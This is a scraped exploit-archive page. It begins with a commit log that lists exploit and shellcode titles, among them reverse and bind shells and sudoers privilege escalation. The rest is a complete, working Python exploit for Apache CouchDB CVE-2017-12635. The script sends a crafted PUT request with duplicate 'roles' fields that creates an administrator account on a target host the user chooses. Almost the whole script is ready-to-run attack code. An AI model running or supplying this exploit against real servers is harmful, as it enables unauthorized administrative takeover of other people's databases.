2090553629
12 changes to exploits/shellcodes VMware Workstations 10.0.0.40273 - 'vmx86.sys' Arbitrary Kernel Read VMware Workstation 10.0.0.40273 - 'vmx86.sys' Arbitrary Kernel Read Microsoft (Win 10) Internet Explorer 11.371.16299.0 - Denial Of Service Microsoft Internet Explorer 11.371.16299.0 (Windows 10) - Denial Of Service VMware Workstation 12.5.2 - Drag n Drop Use-After-Free (Pwn2Own 2017) (PoC) Chrome V8 JIT - 'AwaitedPromise' Update Bug Chrome V8 JIT - Arrow Function Scope Fixing Bug Ultra MiniHTTPd 1.2 - 'GET' Remote Stack Buffer Overflow PoC Shopy Point of Sale v1.0 - CSV Injection Blog Master Pro v1.0 - CSV Injection HRSALE The Ultimate HRM v1.0.2 - CSV Injection HRSALE The Ultimate HRM v1.0.2 - 'award_id' SQL Injection HRSALE The Ultimate HRM 1.0.2 - Authenticated Cross-Site Scripting HRSALE The Ultimate HRM v1.0.2 - Local File Inclusion Linux/x86 - Bind TCP (1337/TCP) Shell + Null-Free Shellcode (92 bytes) Linux/x86 - Edit /etc/sudoers with NOPASSWD for ALL Shellcode Linux/x86 - Reverse TCP (5555/TCP) Shellcode - (73 Bytes) Linux/x86 - Bind TCP (1337/TCP) Shell (/bin/sh) + Null-Free Shellcode (92 bytes) Linux/x86 - Edit /etc/sudoers (ALL ALL=(ALL) NOPASSWD: ALL) For Full Access + Null-Free Shellcode (79 bytes) Linux/x86 - Reverse TCP (127.1.1.1:5555/TCP) Shell Shellcode (73 Bytes) Linux/x86 - cp /bin/sh /tmp/sh; chmod +s /tmp/sh Shellcode (74 bytes) Linux/x86 - execve /bin/sh Shellcode Encoded with ROT-13 + RShift-2 + XOR Encoded (44 bytes) Linux/x86 - execve(cp /bin/sh /tmp/sh; chmod +s /tmp/sh) + Null-Free Shellcode (74 bytes) Linux/x86 - execve(/bin/sh) + ROT-13 + RShift-2 + XOR Encoded Shellcode (44 bytes)
64 lines
No EOL
2.1 KiB
Python
Executable file
64 lines
No EOL
2.1 KiB
Python
Executable file
#!/usr/bin/env python
|
|
|
|
'''
|
|
@author: r4wd3r
|
|
@license: MIT License
|
|
@contact: r4wd3r@gmail.com
|
|
'''
|
|
|
|
import argparse
|
|
import re
|
|
import sys
|
|
import requests
|
|
|
|
parser = argparse.ArgumentParser(
|
|
description='Exploits the Apache CouchDB JSON Remote Privilege Escalation Vulnerability' +
|
|
' (CVE-2017-12635)')
|
|
parser.add_argument('host', help='Host to attack.', type=str)
|
|
parser.add_argument('-p', '--port', help='Port of CouchDB Service', type=str, default='5984')
|
|
parser.add_argument('-u', '--user', help='Username to create as admin.',
|
|
type=str, default='couchara')
|
|
parser.add_argument('-P', '--password', help='Password of the created user.',
|
|
type=str, default='couchapass')
|
|
args = parser.parse_args()
|
|
|
|
host = args.host
|
|
port = args.port
|
|
user = args.user
|
|
password = args.password
|
|
|
|
pat_ip = re.compile("^(([0-9]|[1-9][0-9]|1[0-9]{2}|2[0-4][0-9]|25[0-5])\.){3}([0-9]|[1-9][0-9]|1[0-9]{2}|2[0-4][0-9]|25[0-5])$")
|
|
if not pat_ip.match(host):
|
|
print "[x] Wrong host. Must be a valid IP address."
|
|
sys.exit(1)
|
|
|
|
print "[+] User to create: " + user
|
|
print "[+] Password: " + password
|
|
print "[+] Attacking host " + host + " on port " + port
|
|
|
|
url = 'http://' + host + ':' + port
|
|
|
|
try:
|
|
rtest = requests.get(url, timeout=10)
|
|
except requests.exceptions.Timeout:
|
|
print "[x] Server is taking too long to answer. Exiting."
|
|
sys.exit(1)
|
|
except requests.ConnectionError:
|
|
print "[x] Unable to connect to the remote host."
|
|
sys.exit(1)
|
|
|
|
# Payload for creating user
|
|
cu_url_payload = url + "/_users/org.couchdb.user:" + user
|
|
cu_data_payload = '{"type": "user", "name": "'+user+'", "roles": ["_admin"], "roles": [], "password": "'+password+'"}'
|
|
|
|
try:
|
|
rcu = requests.put(cu_url_payload, data=cu_data_payload)
|
|
except requests.exceptions.HTTPError:
|
|
print "[x] ERROR: Unable to create the user on remote host."
|
|
sys.exit(1)
|
|
|
|
if rcu.status_code == 201:
|
|
print "[+] User " + user + " with password " + password + " successfully created."
|
|
sys.exit(0)
|
|
else:
|
|
print "[x] ERROR " + str(rcu.status_code) + ": Unable to create the user on remote host." |